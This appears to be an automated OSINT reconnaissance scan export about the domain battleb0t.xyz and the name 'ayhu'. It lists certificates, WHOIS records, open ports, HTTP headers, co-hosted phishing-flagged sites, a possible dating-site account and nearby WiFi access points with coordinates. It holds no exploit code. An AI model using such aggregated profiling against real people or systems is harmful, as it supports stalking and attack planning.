Not After : Mar 13 19:16:53 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ed:3c:4c:c6:51:31:a3:0e:29:e8:d9:ba:56:72:
ca:d6:92:a9:ca:6b:b2:16:4e:5d:b5:eb:62:3f:02:
41:f1:08:06:a9:cd:7b:f9:04:b2:4c:8e:fb:65:31:
b3:75:c9:6a:7a:3f:e2:3e:46:f0:3e:66:e4:c8:3d:
cb:d8:17:7d:09:c3:b8:4b:0b:d8:99:0b:f7:8b:94:
1b:46:cc:ac:01:f0:8a:0c:c3:ce:98:ae:96:9a:d8:
ee:30:0d:83:be:56:f2:fa:d2:51:6c:e6:b5:3d:4d:
38:62:17:66:35:98:3b:99:b8:ad:43:ad:7a:14:a8:
2a:90:0e:e4:de:5f:31:31:ab:48:0a:dd:2d:64:89:
33:f3:db:a0:b1:f9:a9:c3:da:71:2f:32:05:fa:a1:
40:b4:5f:a2:f6:e5:8b:5d:99:bb:a1:c7:ff:78:70:
fa:fe:96:c0:01:b6:36:4c:98:38:f0:fd:c2:63:a9:
72:11:2f:85:1a:a3:bf:b4:96:2f:f2:45:ce:b3:c4:
6b:ba:0f:b8:a2:6a:78:27:5b:76:b0:c8:42:4e:41:
26:4e:0a:34:15:4a:e9:08:7d:32:c0:a0:48:38:a7:
68:49:b9:00:6e:d4:89:04:f8:ea:e6:dc:02:c0:03:
83:f0:7d:9a:bd:81:f3:1a:7f:93:46:db:06:a1:a5:
91:0f
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
11:21:5C:1E:81:22:95:8E:F4:BA:FB:D4:B0:77:CD:45:5F:AE:5E:B1
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
76:8a:75:f9:43:a0:e6:61:ea:e3:d4:27:72:39:cb:37:97:94:
6f:0e:14:84:fa:37:4d:a2:29:74:5d:9f:6a:9b:90:69:30:fb:
fe:80:38:47:ab:f9:93:8b:07:ed:9c:23:7a:ce:61:de:37:2c:
b5:38:61:3d:a2:a5:6a:7f:07:4e:90:cc:90:cb:f2:dc:3b:dd:
dc:6e:3d:eb:d5:9b:14:fa:58:fe:7c:53:e1:b8:07:86:02:8a:
6d:b2:53:6a:62:fd:74:1a:77:7e:1a:08:43:f8:18:7a:01:9e:
20:be:c4:45:2e:93:39:21:97:6b:7c:a2:a3:23:1c:fb:d7:fc:
ec:c5:e8:7e:b5:d7:d0:a7:3e:34:ed:91:4c:0f:7d:41:20:d6:
ae:b8:3c:8e:a2:12:49:dc:0d:d5:4c:94:96:63:8e:08:ef:7b:
64:6f:6d:f3:52:e2:36:f2:d4:c5:56:d5:b4:44:ce:06:c1:8d:
33:fb:3d:55:2f:89:df:1e:0c:e0:e0:b5:24:7c:d7:b7:f3:8a:
0e:7c:13:62:fd:45:98:d9:2b:25:ae:f4:5e:83:23:b0:c0:02:
cf:69:26:2e:fd:59:16:e1:d9:9a:02:67:43:02:ef:d7:61:4a:
bd:23:13:4e:92:4d:8b:73:c9:d8:47:4a:c4:8f:e1:ca:a1:27:
eb:65:50:df
| ayhu.xyz |
| 2023-05-12 03:03:17 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | webdisk.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:e5:dd:af:99:9d:87:f1:20:42:ec:19:5a:16:81:
fd:0e:9d:26:43:5b:38:56:01:6c:b9:50:e6:f5:f6:
b7:f4:d9:bc:a6:0e:cd:0a:31:b3:8d:bb:24:04:a8:
02:3f:69:7e:f7:45:10:b5:ca:a5:a1:b5:01:ba:b7:
e8:82:36:5d:7d:4a:67:2b:ea:ed:c8:9d:a8:7d:86:
41:b8:e4:07:fc:50:be:f8:c2:12:f9:9a:f1:3d:47:
b3:9a:27:60:00:dc:a5:4f:8f:6f:e6:86:11:01:b1:
d6:45:d6:cf:7d:92:d8:dd:11:ac:e5:b9:41:b6:0c:
38:5e:c6:36:d3:ff:6e:0d:84:9c:c2:8a:cc:3f:7f:
39:73:81:05:d0:7c:d4:98:d7:c4:2e:70:4d:8f:5d:
72:05:90:a8:a3:08:60:0e:68:3c:fe:ac:07:23:66:
f2:29:3f:3b:9e:fe:9e:1a:5d:c2:2b:f9:d5:68:01:
b1:7f:26:80:2c:5d:d8:4c:d8:54:56:d0:35:f9:31:
4d:76:6c:1a:c1:ba:c3:e7:3a:74:2f:ed:05:4b:a4:
71:2f:df:1e:d5:dc:b9:23:46:96:17:ad:cc:ef:a5:
ee:d7:26:ac:0b:5d:33:ef:55:fd:c5:75:d0:bb:f3:
29:99:ce:33:73:02:ba:2d:3b:cc:c0:6b:10:49:90:
f8:db
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 14 04:53:54.573 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D2:4D:1F:4C:53:A2:2C:16:48:36:E0:
E3:59:95:10:4D:AC:DA:52:1A:46:2E:19:E7:DA:3A:94:
30:B2:B6:AF:0D:02:21:00:B0:C6:A1:4B:9B:FE:4E:59:
8A:FC:46:1B:75:55:34:A2:8C:0A:51:5A:D3:3F:C3:63:
FB:4F:E2:E6:C3:EE:2C:9A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 14 04:53:55.080 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:19:ED:EC:3B:A7:32:A8:30:D7:4E:2F:1A:
02:02:BB:D6:DD:30:69:59:5A:E6:97:33:2E:BA:E1:81:
BB:CB:99:00:02:21:00:D4:02:BD:53:9C:06:85:84:2D:
D9:33:CD:60:59:DF:DC:44:B2:4C:A9:FF:8D:9F:75:90:
F0:18:EF:92:21:63:F2
Signature Algorithm: sha256WithRSAEncryption
47:e5:47:8a:5f:84:37:c0:02:97:35:aa:f2:b0:78:40:e7:a7:
4b:75:22:0b:a5:fb:81:51:db:7f:48:05:05:cf:56:dd:69:5f:
ff:a9:81:35:df:0e:37:63:bc:cf:e9:04:35:2e:93:0d:cb:ec:
3b:29:06:9b:cc:f9:88:91:0c:0c:6c:50:03:1e:f2:37:b0:d2:
3a:51:bd:ea:2e:d4:c1:14:23:12:fa:23:c6:0b:23:6d:59:64:
37:c1:19:f0:fc:0a:70:3f:3e:a2:ba:a9:1b:1a:a0:9a:c0:a8:
92:f0:f6:cb:41:69:32:ab:f7:f7:32:b0:fb:af:db:e0:fa:c9:
05:b6:49:21:d5:48:07:23:f4:14:1e:e6:16:03:17:40:fa:84:
7e:34:ed:67:8d:2b:63:9c:57:50:bd:40:57:13:4f:56:ea:0d:
6b:4e:d6:08:40:d4:cb:ee:ab:df:5c:7f:66:51:e8:c5:80:2c:
36:f3:57:45:b8:4e:cf:13:55:68:05:43:37:5d:53:06:76:78:
12:7a:43:6a:d4:09:c5:e2:b2:a3:69:4f:a7:d9:91:58:86:8d:
48:37:1c:60:ed:eb:48:b9:bd:5d:b1:4d:ac:af:9b:5b:a2:ab:
a6:a4:49:fb:f3:b8:d3:3f:2c:d0:72:37:b1:a4:ae:8b:5e:82:
84:78:32:a1
|
| 2023-05-12 02:52:08 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:96:9b:29:e7:ba:1f:ed:f3:53:36:ca:2c:46:93:27:46:97
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 15:44:09 2022 GMT
Not After : Mar 13 15:44:08 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c5:26:42:72:54:54:74:21:1e:c0:7a:66:54:5a:
e8:26:8a:a7:bb:78:e0:52:09:b4:70:cd:bc:21:4b:
2c:77:39:63:f4:67:8f:19:31:3e:f0:0f:58:55:9d:
80:0d:29:74:7f:66:1f:df:6c:0f:e4:7c:f2:b1:63:
d3:73:4b:d0:8e:1c:94:d5:39:9f:87:08:c9:39:28:
06:18:ff:8b:b4:c8:13:46:ac:cf:6d:a5:8c:43:a0:
09:d6:74:e4:1b:e6:a1:90:6d:22:b3:ba:58:9d:f7:
79:37:55:b1:58:ef:15:cb:64:d0:30:b0:3c:9c:57:
0f:fe:6c:6b:bb:3f:27:84:33:78:b0:19:92:bf:97:
a6:0f:20:d5:97:af:a6:3b:9d:2c:b6:18:1b:80:b6:
fb:2e:b9:e7:44:40:3a:ab:de:d1:27:94:5c:98:f3:
69:c6:eb:0a:ba:59:dd:58:0a:8d:f7:6b:71:2d:96:
80:0b:9a:05:20:72:48:c7:59:11:c0:d5:98:a3:64:
8a:78:35:12:8b:20:64:de:10:73:21:62:d5:82:94:
42:92:41:f0:40:98:0d:fd:64:08:ef:ba:99:48:1d:
ae:86:bd:de:46:1e:c7:72:49:3d:93:76:b8:e9:ff:
0d:e2:5c:31:61:a9:f2:59:1c:92:cb:56:9f:9b:f7:
48:28:35:ef:e1:4f:ae:4c:d6:6f:39:80:a0:50:ab:
78:66:96:ff:8d:78:93:50:2d:b7:0a:ef:fe:70:44:
cf:d9:e4:4f:5e:34:97:d6:93:af:d9:54:30:40:86:
24:9c:59:46:7c:df:86:e9:5e:eb:17:7f:95:e4:0e:
70:f5:5a:35:d4:64:cb:b9:5b:5c:bb:45:e6:4e:80:
a3:6d:83:42:86:a4:44:3b:83:c2:1d:e2:02:99:d0:
36:4c:c3:91:eb:69:38:a7:7d:2f:35:65:33:3e:23:
0b:5d:1b:0c:01:a1:10:75:e2:ac:bb:3b:bf:f6:2f:
ec:4e:98:ec:53:ee:86:34:4c:69:d1:38:5c:a9:07:
72:79:62:64:81:ea:03:fc:2f:18:db:04:b6:04:36:
1d:bc:01:56:0e:d9:49:1c:dd:41:11:ce:34:13:0f:
13:81:d8:cd:71:a3:fc:76:2b:ea:14:1c:8d:38:63:
54:f1:73:9f:26:18:47:68:79:40:b9:a0:ac:b7:d2:
e0:a8:36:94:6f:0c:c3:56:34:6a:ee:a7:97:c4:d3:
0b:44:a3:56:87:d8:dc:ce:f3:89:8c:09:62:1a:25:
1f:dd:5f:2a:c0:d4:a9:14:4f:34:09:bc:53:d5:35:
be:6b:0d:6a:49:bf:0b:11:66:23:11:60:25:c5:db:
56:15:5d
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:E8:B3:AA:B6:B4:6A:08:8C:66:4E:1B:FC:F4:D4:C0:C8:AD:D7:A5
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
23:97:7b:03:b9:f4:a4:34:12:d3:21:3d:da:44:f5:20:c3:b1:
3b:ac:6b:d9:60:b8:b7:69:bb:7a:12:d5:25:8c:0f:00:de:f7:
36:a4:48:3c:17:0b:8b:18:53:7e:62:90:c7:ad:c4:3d:35:34:
7d:53:88:f9:54:65:04:22:df:53:b4:19:52:e4:bc:5e:0b:03:
2b:1e:62:32:2a:0c:d4:df:76:d7:3c:d0:ee:2e:d6:fe:2e:91:
01:8b:82:92:c3:06:53:df:e0:c5:5e:14:ca:21:52:f8:77:c2:
63:cb:6d:04:c8:e2:63:8d:d8:f2:81:13:be:86:29:78:4d:d3:
15:f3:e6:0d:45:f1:0a:26:81:2a:91:e1:c5:11:de:38:7b:0c:
cf:72:df:63:25:33:a6:15:a5:be:c2:1d:86:c1:1d:1c:dc:30:
fc:22:c3:9f:a9:fa:7c:dd:a4:c0:3b:50:98:18:64:aa:5a:5b:
60:a4:a5:3e:e0:2c:e4:d0:4b:8a:7e:bc:80:27:a1:5e:d2:25:
b1:27:e5:25:2c:1a:a2:db:28:f3:fa:2d:33:78:d3:45:4c:a4:
5f:a1:7f:85:be:04:d2:fe:95:ff:fd:b1:53:9f:47:43:cf:75:
33:c3:8e:7b:1a:d7:d7:ca:fd:b4:9d:e3:3d:6e:15:33:3e:ee:
1e:db:28:8f
| battleb0t.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 101 (Net ID: 00:01:03:79:1E:5C) | 34.0544, -118.244 |
| 2023-05-12 03:09:34 | Affiliate - Internet Name | No | DNS Resolver | 1 | 0 | 4 | 0 | None | 01def.io | 64.226.81.48 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | swwlan (Net ID: 00:02:2D:18:2C:14) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:46:49 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
02:5a:61:0f:58:eb:84:f1:ad:53:ae:03:dc:a9:84:7a
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1
Validity
Not Before: Dec 21 00:00:00 2022 GMT
Not After : Jan 21 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=Netlify, Inc, CN=*.netlify.app
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:64:c3:ab:83:a1:9f:9b:f7:ff:e5:00:bf:41:ae:
cd:d1:cd:1c:5d:8d:4d:62:fb:0e:e4:90:33:13:2d:
b5:45:91:e6:7a:26:a0:5e:01:ae:25:84:fb:d5:88:
23:7e:13:7e:a9:d3:a5:de:69:2d:91:69:c3:12:86:
5a:94:02:42:28
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:0A:BC:08:29:17:8C:A5:39:6D:7A:0E:CE:33:C7:2E:B3:ED:FB:C3:7A
X509v3 Subject Key Identifier:
3E:6A:BE:6E:25:AC:12:10:AB:BE:F1:EB:A7:A9:BC:6D:88:7D:54:8F
X509v3 Subject Alternative Name:
DNS:*.netlify.app, DNS:netlify.app
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl
Full Name:
URI:http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crt
X509v3 Basic Constraints:
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 76:FF:88:3F:0A:B6:FB:95:51:C2:61:CC:F5:87:BA:34:
B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Dec 21 09:03:52.902 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:31:BA:E4:35:B8:DF:14:C3:99:B3:D0:FB:
C6:93:77:5C:5A:D1:E2:7C:62:90:83:BB:77:59:14:17:
00:CD:14:09:02:21:00:A0:89:29:6C:06:8B:80:0E:58:
FD:7C:72:66:63:BF:84:90:99:2F:F3:90:6D:39:BD:86:
6C:21:15:5D:B2:9C:A1
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 48:B0:E3:6B:DA:A6:47:34:0F:E5:6A:02:FA:9D:30:EB:
1C:52:01:CB:56:DD:2C:81:D9:BB:BF:AB:39:D8:84:73
Timestamp : Dec 21 09:03:52.857 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D2:85:6B:1A:5F:D3:6B:D9:52:36:0B:
44:9B:B7:9C:FF:8D:70:8C:F4:D1:34:69:3C:10:D4:AD:
03:93:DD:F1:A4:02:21:00:C0:7F:F8:B3:01:C9:63:4D:
D3:D5:2B:F6:46:B5:04:38:1F:2D:8A:D9:5F:C8:07:F8:
5D:FA:B6:44:79:49:3C:9A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 3B:53:77:75:3E:2D:B9:80:4E:8B:30:5B:06:FE:40:3B:
67:D8:4F:C3:F4:C7:BD:00:0D:2D:72:6F:E1:FA:D4:17
Timestamp : Dec 21 09:03:52.852 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:87:5E:CF:47:90:E0:B2:0D:AA:FC:5D:
58:AA:C9:7E:AE:76:49:89:1E:EB:25:CD:66:CC:A5:23:
F6:24:7A:AE:07:02:20:5E:32:A3:09:9E:48:84:4A:A9:
3B:C0:AA:53:22:AB:E0:9A:BF:4F:DB:FB:66:C2:2B:F8:
4E:E8:E8:BE:9A:FD:22
Signature Algorithm: ecdsa-with-SHA384
30:66:02:31:00:a8:8f:12:1b:fa:2f:f4:cc:aa:04:9b:b9:ea:
95:f5:30:5a:59:f6:f8:b4:4d:b6:51:7e:89:b3:c8:92:7a:7e:
80:c0:81:be:6e:38:4e:5e:5a:7d:bb:10:72:ae:d7:11:5f:02:
31:00:fc:dd:52:7b:4b:33:ad:13:21:0b:b3:8a:93:5d:fb:03:
ac:f0:f4:f6:55:46:ed:1e:45:14:60:d2:47:04:5f:56:a0:b6:
8d:b8:c7:6a:0b:fd:73:a6:07:2b:fa:b2:e2:49
| 35.229.48.116 |
| 2023-05-12 02:54:41 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.196.30.220:80 | 104.196.30.220 |
| 2023-05-12 03:01:29 | Raw Data from RIRs | No | Tool - WhatWeb | 1 | 0 | 2 | 0 | None | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://fluid.battleb0t.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'RESERVED'], u'module': [u'ZZ']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://fluid.battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'report-to,nel,cf-cache-status,cf-ray,alt-svc']}, u'IP': {u'string': [u'172.64.80.1']}}}, {}] | fluid.battleb0t.xyz |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | interpals (Category: dating)
https://www.interpals.net/ayhu | ayhu |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WwRFDMWv1i%2FLL8I%2BSQXrEl8P6VG5M1GGitMkpd4FkAGmtOdqQDCLc17nGzjDcmqZpet%2BvxBX8CUcOAv3alTgafYDwFhVZzoAKiiOmj1uFX8dLMhZ1ZA2lQdL%2FA%3D%3D"}],"group":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=WwRFDMWv1i%2FLL8I%2BSQXrEl8P6VG5M1GGitMkpd4FkAGmtOdqQDCLc17nGzjDcmqZpet%2BvxBX8CUcOAv3alTgafYDwFhVZzoAKiiOmj1uFX8dLMhZ1ZA2lQdL%2FA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60363a5a178c-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.133): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Allstate 5G (Net ID: 00:02:6F:F8:0A:41) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:00:37 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | abuse@namecheap.com | Domain Name: BATTLEBOT.XYZ
Registry Domain ID: D199559633-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://namecheap.com
Updated Date: 2022-09-05T15:48:14.0Z
Creation Date: 2020-09-07T05:35:36.0Z
Registry Expiry Date: 2023-09-07T23:59:59.0Z
Registrar: Namecheap
Registrar IANA ID: 1068
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant State/Province: Capital Region
Registrant Country: IS
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DNS1.REGISTRAR-SERVERS.COM
Name Server: DNS2.REGISTRAR-SERVERS.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:59:45.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: battlebot.xyz
Registry Domain ID: D199559633-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-08-08T05:51:35.56Z
Creation Date: 2020-09-07T05:35:36.00Z
Registrar Registration Expiration Date: 2023-09-07T23:59:59.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 677814ebbbc94b77b8833f353c860afe.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 677814ebbbc94b77b8833f353c860afe.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 677814ebbbc94b77b8833f353c860afe.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:59:45.60Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:00:49 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0-range.github.io | 185.199.111.153 |
| 2023-05-12 03:13:02 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [000.github.io]
https://www.openphish.com/feed.txt | 000.github.io |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | GOLFNET (Net ID: 00:05:3C:07:87:1A) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:08:52 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.129 | 34.148.97.127 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | RichA (Net ID: 00:02:6F:8D:88:99) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:54:48 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 34.148.97.127:443 | 34.148.97.127 |
| 2023-05-12 02:44:06 | Internet Name | No | CertSpotter | 37 | 0 | 1 | 0 | None | kekw.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX551548FF6 (Net ID: 00:01:E3:54:8F:F6) | 52.3759, 4.8975 |
